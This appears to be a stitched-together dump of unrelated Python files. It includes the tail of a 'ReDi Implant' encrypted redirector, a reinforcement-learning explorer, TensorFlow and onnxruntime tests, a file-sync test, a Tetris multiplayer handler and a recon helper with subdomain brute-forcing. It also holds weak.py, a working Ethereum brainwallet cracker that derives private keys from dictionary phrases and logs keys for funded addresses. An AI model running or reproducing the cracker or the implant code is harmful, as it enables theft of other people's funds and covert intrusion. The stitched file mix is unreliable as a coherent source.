parser.add_argument("-c", "--connect", help="Connect to a Redirector Server", required=False)
parser.add_argument("-k", "--key", help="Encryption Key", type=str, required=False)
args = parser.parse_args()
# Creates the Error when no Key is provided to connect to another ReDi Implant, but needed
if args.connect and not args.key:
parser.error("[!] Error: Key required to connect to this Implant!!!")
# Creates the Cipher Variable to be used for Encrypted Communications
if args.key:
cipher = AESCipher(bytearray.fromhex(args.key))
else:
cipher = AESCipher()
# Prints the 256-bit AES key used for Encrypted Communications
print(cipher)
# Starts the Server or Client modes, depending on Arguments provided
if args.listen:
server()
elif args.connect:
client(args.connect)
|
explorer.py
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import signal
import threading
from copy import deepcopy
from absl import logging
from xt.framework.agent_group import AgentGroup
from xt.framework.comm.uni_comm import UniComm
from xt.framework.comm.message import message, get_msg_info, get_msg_data, set_msg_info
from xt.util.logger import set_logging_format
set_logging_format()
class Explorer(object):
""" explorer is used to explore environment to generate train data """
def __init__(self, config_info, broker_id, recv_broker, send_broker):
self.env_para = deepcopy(config_info.get("env_para"))
self.alg_para = deepcopy(config_info.get("alg_para"))
self.agent_para = deepcopy(config_info.get("agent_para"))
self.recv_broker = recv_broker
self.send_broker = send_broker
self.recv_agent = UniComm("LocalMsg")
self.send_agent = UniComm("LocalMsg")
self.explorer_id = self.env_para.get("env_id")
self.broker_id = broker_id
self.rl_agent = None
logging.debug("init explorer with id: {}".format(self.explorer_id))
def start_explore(self):
""" start explore process """
signal.signal(signal.SIGINT, signal.SIG_IGN)
os.environ["CUDA_VISIBLE_DEVICES"] = str(-1)
explored_times = 0
try:
self.rl_agent = AgentGroup(
self.env_para,
self.alg_para,
self.agent_para,
self.send_agent,
self.recv_agent,
)
explore_time = self.agent_para.get("agent_config", {}).get("sync_model_interval", 1)
logging.info("AgentGroup start to explore with sync interval-{}".format(explore_time))
while True:
self.rl_agent.explore(explore_time)
explored_times += explore_time
logging.debug("end explore-{}".format(explored_times))
except BaseException as ex:
logging.exception(ex)
os._exit(4)
def start_data_transfer(self):
""" start transfer data and other thread """
data_transfer_thread = threading.Thread(target=self.transfer_to_broker)
data_transfer_thread.start()
data_transfer_thread = threading.Thread(target=self.transfer_to_agent)
data_transfer_thread.start()
def transfer_to_agent(self):
""" send train data to learner """
while True:
data = self.recv_broker.get()
cmd = get_msg_info(data, "cmd")
if cmd == "close":
print("enter explore close")
self.close()
continue
data = get_msg_data(data)
self.send_agent.send(data)
def transfer_to_broker(self):
""" send train data to learner """
while True:
data = self.recv_agent.recv()
set_msg_info(data, broker_id=self.broker_id,
explorer_id=self.explorer_id)
self.send_broker.send(data)
def start(self):
""" start actor's thread and process """
self.start_data_transfer()
self.start_explore()
def close(self):
self.rl_agent.close()
def setup_explorer(broker_master, config_info, env_id):
config = deepcopy(config_info)
config["env_para"].update({"env_id": env_id})
msg = message(config, cmd="create_explorer")
broker_master.recv_local_q.send(msg)
|
fifo_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.FIFOQueue."""
import time
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
class FIFOQueueTest(xla_test.XLATestCase):
def testEnqueue(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=(3, 2))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testMultipleDequeues(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue([1]))
self.evaluate(q.enqueue([2]))
self.evaluate(q.enqueue([3]))
a, b, c = self.evaluate([q.dequeue(), q.dequeue(), q.dequeue()])
self.assertAllEqual(set([1, 2, 3]), set([a, b, c]))
def testQueuesDontShare(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue(1))
q2 = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q2.enqueue(2))
self.assertAllEqual(self.evaluate(q2.dequeue()), 2)
self.assertAllEqual(self.evaluate(q.dequeue()), 1)
def testEnqueueDictWithoutNames(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
with self.assertRaisesRegex(ValueError, "must have names"):
q.enqueue({"a": 12.0})
def testParallelEnqueue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in range(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in range(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(3, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in range(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in range(len(elems)):
x_val, y_val = sess.run(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, self.evaluate(size))
dequeued_t.op.run()
self.assertEqual(0, self.evaluate(size))
if __name__ == "__main__":
test.main()
|
test_folder_sync.py
|
from diode_ftp.header import hash_file
from diode_ftp.FolderSender import FolderSender
from diode_ftp.FolderReceiver import FolderReceiver
from pathlib import Path
from shutil import Error, copy2
from tests.common import *
import asyncio
import threading
import time
def create_send_rcv_folder(root: Path):
send = root / 'send'
rcv = root / 'rcv'
send.mkdir()
rcv.mkdir()
print(send, rcv)
return send, rcv
def do_sync_in_bkgd(send: Path, rcv: Path):
port = get_available_port()
sender = FolderSender(send, send_to=('127.0.0.1', port))
receiver = FolderReceiver(rcv)
def sender_thread():
sender.perform_sync()
def receiver_thread():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
t = loop.create_datagram_endpoint(lambda: receiver, local_addr=('0.0.0.0', port))
loop.run_until_complete(t)
loop.run_forever()
    send_proc = threading.Thread(target=sender_thread, daemon=True)
    rcv_proc = threading.Thread(target=receiver_thread, daemon=True)
send_proc.start()
rcv_proc.start()
def test_folder_sync(tmp_path: Path):
send, rcv = create_send_rcv_folder(tmp_path)
copy2(PAYLOAD, send / 'payload.txt')
copy2(BIG_FILE, send / 'big.bin')
do_sync_in_bkgd(send, rcv)
start = time.monotonic()
while time.monotonic() - start < 60:
# give it up to 60 seconds to sync
try:
assert hash_file(rcv / 'payload.txt') == PAYLOAD_HASH, "File hashes should be the same"
assert hash_file(rcv / 'big.bin') == BIG_HASH, "File hashes should be the same"
return
except Exception as e:
pass
# print('Could not check hashes because of: ', e)
assert False, "timeout for the folder sync to complete"
def test_diodeinclude(tmp_path: Path):
send, rcv = create_send_rcv_folder(tmp_path)
copy2(PAYLOAD, send / 'payload.txt')
copy2(PAYLOAD, send / 'payload.md')
# only send the markdown file
(send / '.diodeinclude').write_text('*.md')
do_sync_in_bkgd(send, rcv)
start = time.monotonic()
while time.monotonic() - start < 60:
# give it up to 60 seconds to sync
try:
assert hash_file(rcv / 'payload.md') == PAYLOAD_HASH, "File hashes should be the same"
assert not (rcv / 'payload.txt').exists(), "We should not send *.txt files"
return
except Exception as e:
pass
# print('Could not check hashes because of: ', e)
assert False, "timeout for the folder sync to complete"
|
online_handler.py
|
import websocket
import time
import threading
import json
from .game_instance import GameInstance
from .components.mino import Mino
from .launcher.online_lobby import OnlineLobby
from .launcher.gui_com import GuiCom
from .consts.urls import URLS
# receiving codes
RCODES = {
'game_data': 'gd',
'game_over': 'go',
'match_set': 'ms',
'match_complete': 'mc',
'game_start': 'gs',
'waiter_list': 'wl',
'host_accepted': 'ha',
'host_rejected': 'hr',
'approacher_list': 'al',
'lose': 'lo',
'win': 'wi'
}
# sending codes
SCODES = {
'game_data': 'gd',
'game_over': 'go',
'waiting_list_add': 'wa',
'waiting_list_remove': 'wr',
'waiting_list_get': 'wg',
'approach': 'a',
'approach_cancel': 'ac',
'host_accept': 'ha',
'host_reject': 'hr',
}
def on_error(ws, error):
print(error)
def on_close(ws, close_status_code, close_msg):
print("### closed ###")
class OnlineHandler:
def __init__(self, user_id: str,
game_instance: GameInstance,
opponent_instance: GameInstance,
online_lobby: OnlineLobby,
online_data: GuiCom,
jwt: str):
websocket.enableTrace(True)
self.status = 'hello'
self.user_id = user_id
self.jwt = jwt
self.game_instance = game_instance
self.opponent_instance = opponent_instance
self.opponent = None
self.online_lobby_gui = online_lobby
self.current_waiter_list = []
self.current_approacher_list = []
self.ws: websocket.WebSocketApp = websocket.WebSocketApp(
URLS.mp_server_url,
on_open=lambda ws: self.on_open(ws),
on_message=lambda ws, msg: self.on_message(ws, msg),
on_error=on_error,
on_close=lambda ws, close_status_code, close_msg: self.on_close(ws, close_status_code, close_msg),
)
self.online_data = online_data
        self.ws_thread = threading.Thread(target=self.ws_connect, daemon=True)  # WebSocket connection thread
        self.s_game_data_thread = threading.Thread(target=self.s_game_data_loop, daemon=True)  # game data sending thread
        self.gui_emit_thread = threading.Thread(target=self.on_emit, daemon=True)  # receives input from the online_lobby GUI
def on_emit(self):
while True:
data = self.online_data.handler_queue.get()
self.parse_emit(data)
def parse_emit(self, msg: dict):
todo = msg['t']
data = msg['d']
if todo == SCODES['host_accept']:
self.s_host_accept(data)
elif todo == SCODES['host_reject']:
self.s_host_reject(data)
elif todo == SCODES['approach']:
if self.status != 'approaching':
self.s_approach(data)
self.status = 'approaching'
elif todo == SCODES['approach_cancel']:
self.s_approach_cancel()
self.status = 'hello'
elif todo == SCODES['waiting_list_add']:
self.s_waiting_list_add()
self.status = 'waiting'
elif todo == SCODES['waiting_list_remove']:
self.s_waiting_list_remove()
self.status = 'hello'
elif todo == SCODES['waiting_list_get']:
self.s_waiting_list_get()
    def on_open(self, ws: websocket.WebSocketApp):  # called when the connection is opened
self.jwt_auth()
def jwt_auth(self):
req = {
'id': self.user_id,
'jwt': self.jwt
}
self.send_json_req(req)
def on_message(self, ws, message):
try:
raw_data = json.loads(message) # a dict with two top-level keys ('t' and 'd')
print(raw_data) # debug
except json.JSONDecodeError:
raw_data = None
print('message not in json format')
if raw_data is not None and raw_data != []:
self.r_parse_data(raw_data)
def on_close(self, ws, close_status_code, close_msg):
print("### closed ###")
print(f'{close_status_code}')
print(f'{close_msg}')
sig = self.build_dict(t='server_connection_lost')
self.online_lobby_gui.signal.emit(sig) # notify the GUI that the server connection was lost
# websocket connection
def ws_connect(self):
self.ws.run_forever()
# reset the game instances
def reset_instances(self):
self.opponent_instance.reset()
self.game_instance.reset()
def game_start(self):
self.status = 'in_game'
self.reset_instances()
self.online_lobby_gui.signal.emit(self.build_dict('game_start'))
self.game_instance.status = 'mp_game_ready'
time.sleep(3)
self.s_game_data_thread_restart()
self.game_instance.ev_game_start()
# receive handlers below
# parse incoming data
def r_parse_data(self, raw_data):
try:
t = raw_data['t']
d = raw_data['d']
except KeyError:
t = None
d = None
print(f'Cannot parse data:\n{raw_data=}')
print(self.status)
if t == RCODES['game_data']:
self.r_update_opponent_info(d)
elif t == RCODES['game_over']:
self.r_on_op_game_over()
elif t == RCODES['game_start']:
self.game_start()
elif t == RCODES['match_complete'] or t == RCODES['win'] or t == RCODES['lose']:
self.r_on_match_complete(t)
elif t == RCODES['host_rejected']:
self.r_host_rejected()
elif t == RCODES['approacher_list']:
self.r_update_current_approacher(d)
elif t == RCODES['waiter_list']:
self.r_update_current_waiter_list(d)
def r_update_opponent_info(self, d: dict):
if d:
score = d.get('score')
level = d.get('level')
goal = d.get('goal')
matrix = d.get('matrix')
next_mino_index = d.get('next_mino_index')
hold_mino_index = d.get('hold_mino_index')
self.opponent_instance.score = score
self.opponent_instance.level = level
self.opponent_instance.goal = goal
self.opponent_instance.board.temp_matrix = matrix
self.opponent_instance.next_mino = Mino(next_mino_index)
if hold_mino_index != -1:
self.opponent_instance.hold_mino = Mino(hold_mino_index)
def r_on_lose(self):
self.game_instance.status = 'mp_lose'
def r_on_win(self):
self.game_instance.status = 'mp_win'
def r_on_nothing(self):
self.game_instance.status = 'mp_hello'
def r_on_op_game_over(self):
self.opponent_instance.status = 'game_over'
def r_on_match_complete(self, t):
if t == RCODES['win']:
self.r_on_win()
elif t == RCODES['lose']:
self.r_on_lose()
elif t == RCODES['match_complete']:
self.r_on_nothing() # the match ended without a winner
self.status = 'hello' # todo: replace status strings with constants
self.online_lobby_gui.signal.emit('init') # reset the gui when the game ends
def r_update_current_approacher(self, d):
self.current_approacher_list = d
self.online_lobby_gui.approacher_list = d # update the approacher_list data
self.online_lobby_gui.approacher_update() # gui refresh
def r_update_current_waiter_list(self, d):
self.current_waiter_list = d
self.online_lobby_gui.waiter_list = d # update the waiter_list data
self.online_lobby_gui.waiter_update() # gui refresh
def r_host_rejected(self):
self.status = 'hello'
self.online_lobby_gui.signal.emit(self.build_dict('approach_rejected')) # todo: replace signal strings with constants
# send helpers below
def send_json_req(self, req):
try:
self.ws.send(json.dumps(req))
except websocket.WebSocketConnectionClosedException:
sig = self.build_dict(t='server_connection_lost')
self.online_lobby_gui.signal.emit(sig)
@staticmethod
def build_dict(t: str, d=None):
to_return = {
't': t,
'd': d
}
return to_return
def build_and_send_json_req(self, t: str, d=None):
req = self.build_dict(t, d)
self.send_json_req(req=req)
def s_waiting_list_add(self):
self.build_and_send_json_req(SCODES['waiting_list_add'])
def s_waiting_list_remove(self):
self.build_and_send_json_req(SCODES['waiting_list_remove'])
def s_waiting_list_get(self):
self.build_and_send_json_req(SCODES['waiting_list_get'])
def s_approach(self, waiter_id: str):
self.build_and_send_json_req(SCODES['approach'], waiter_id)
def s_approach_cancel(self):
self.build_and_send_json_req(SCODES['approach_cancel'])
def s_host_accept(self, approacher_id: str):
self.build_and_send_json_req(SCODES['host_accept'], approacher_id)
# self.game_start()
def s_host_reject(self, approacher_id: str):
self.build_and_send_json_req(SCODES['host_reject'], approacher_id)
def s_game_data(self):
d = {
'id': self.user_id,
'score': self.game_instance.score,
'level': self.game_instance.level,
'goal': self.game_instance.goal,
'matrix': self.game_instance.board.temp_matrix,
'next_mino_index': self.game_instance.next_mino.shape_index,
'hold_mino_index': self.get_hold_mino_index(),
}
self.build_and_send_json_req(SCODES['game_data'], d)
def get_hold_mino_index(self) -> int:
if self.game_instance.hold_mino is not None:
return self.game_instance.hold_mino.shape_index
else:
return -1
def s_game_data_loop(self): # intended to run as a thread
while True:
if self.game_instance.status == 'in_game':
self.s_game_data() # may need to be made asynchronous
time.sleep(0.1) # send roughly every 0.1 seconds
if self.game_instance.status == 'game_over': # stop once the game is over
self.build_and_send_json_req(t=SCODES['game_over'], d=None)
self.online_lobby_gui.signal.emit(self.build_dict('init'))
break
def s_game_data_thread_init(self): # re-create the game data send thread
self.s_game_data_thread = threading.Thread(target=self.s_game_data_loop, daemon=True)
def s_game_data_thread_restart(self): # restart the game data send thread
self.s_game_data_thread_init()
self.s_game_data_thread.start()
|
weak.py
|
import threading
import os
import time
import codecs
import requests
import json
from ecdsa import SigningKey, SECP256k1
import sha3
import traceback
def getAddress(phrases):
keyList = []
addrList = []
addrStr = ""
try:
for phrase in phrases:
key = sha3.keccak_256(phrase.encode("utf-8")).hexdigest()
priv = codecs.decode(key, 'hex_codec')
pub = SigningKey.from_string(priv, curve=SECP256k1).get_verifying_key().to_string()
addr = "0x" + sha3.keccak_256(pub).hexdigest()[24:]
keyList.append(key)
addrList.append(addr)
if len(addrStr): addrStr = addrStr + ","
addrStr = addrStr + addr
except:
pass
return [keyList, addrList, addrStr]
def getBalances(addrStr):
balances = ""
try:
r = requests.get(url='https://etherchain.org/api/account/multiple/%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
if balances['status'] != 1: raise Exception("API Busy")
balances = balances['data']
except:
print (balances)
return balances
getCount = 0
fp_dict = open("dict.txt", "r")
fp_found = open("found.txt", "w+")
fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
phrases = []
try:
for i in range(50):
readStr = fp_dict.readline().replace("\r","").replace("\n","")
if not len(readStr): break
phrases.append(readStr)
except:
pass
if len(phrases) <= 0: break
addressRet = getAddress(phrases)
getCount = getCount + len(phrases)
try:
balancesRet = getBalances(addressRet[2])
for balance in balancesRet:
key = ""
for i in range(0, len(addressRet[1])):
if balance['address'] == addressRet[1][i]:
key = addressRet[0][i]
break
if key == "": continue
fp_found.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
if balance['balance'] > 0:
fp_fund.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
#print (balance['balance'], key, balance['address'])
fp_found.flush()
fp_fund.flush()
except:
traceback.print_exc()
continue
clearScreen()
print (getCount)
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
func.py
|
import requests
import json
import whois
from colorama import Fore,init
init(autoreset=True)
def whois_search(domain):
result=whois.whois(domain)
print(Fore.BLUE+"Domain",":",Fore.GREEN+str(result.domain_name))
print(Fore.BLUE+"Registrar",":",Fore.GREEN+str(result.registrar))
print(Fore.BLUE+"Updates at",":",Fore.GREEN+str(result.upadated_date))
print(Fore.BLUE+"Created at",":",Fore.GREEN+str(result.created_date))
print(Fore.BLUE+"Expires at",":",Fore.GREEN+str(result.expiry_date))
from threading import Thread
from queue import Queue
q = Queue()
def scan_subdomains(domain):
global q
while True:
# get the subdomain from the queue
subdomain = q.get()
# scan the subdomain
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print(Fore.CYAN+"[+] Discovered subdomain:", url)
# we're done with scanning that subdomain
q.task_done()
def scanner(domain, n_threads, subdomains):
global q
# fill the queue with all the subdomains
for subdomain in subdomains:
q.put(subdomain)
for _ in range(n_threads):
# start all threads
worker = Thread(target=scan_subdomains, args=(domain,))
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
def scan(domain):
wordlist = "subdomains.txt"
num_threads = 10
scanner(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines())
q.join()
def geo(ip):
url="http://ip-api.com/json/{ip}".format(ip=ip)
resp=requests.get(url)
resp=resp.text
resp=json.loads(resp)
for keys,values in resp.items():
print(Fore.CYAN+keys,":",values)
def isvpn(ip):
f=open("config.json","r")
f=f.read()
key=json.loads(f)
key=key["vpnapi.io"]
url="https://vpnapi.io/api/{ip}?key={key}".format(key=key,ip=ip)
resp=requests.get(url)
resp=resp.text
resp=json.loads(resp)
try:
for keys,values in resp["security"].items():
print(Fore.CYAN+keys,":",values)
except KeyError:
print(Fore.RED+"Invalid IP...")
def ns(domain):
result=whois.whois(domain)
ns=result.name_servers
for i in ns:
print(Fore.CYAN+i)
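# Hedged usage sketch (not part of the original module); "example.com" and
# "1.1.1.1" are placeholder inputs. scan() additionally expects a subdomains.txt
# wordlist and isvpn() a config.json API key next to this file.
if __name__ == "__main__":
    whois_search("example.com")
    ns("example.com")
    geo("1.1.1.1")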
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# test get/set of "cuda_mem_limit" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('cuda_mem_limit' in option)
ori_mem_limit = option['cuda_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['cuda_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], str(new_mem_limit))
option['cuda_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], ori_mem_limit)
# test get/set of "arena_extend_strategy" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('arena_extend_strategy' in option)
for strategy in ['kNextPowerOfTwo', 'kSameAsRequested']:
option['arena_extend_strategy'] = strategy
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['arena_extend_strategy'], strategy)
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configuring the session with invalid option values should fail
with self.assertRaises(RuntimeError):
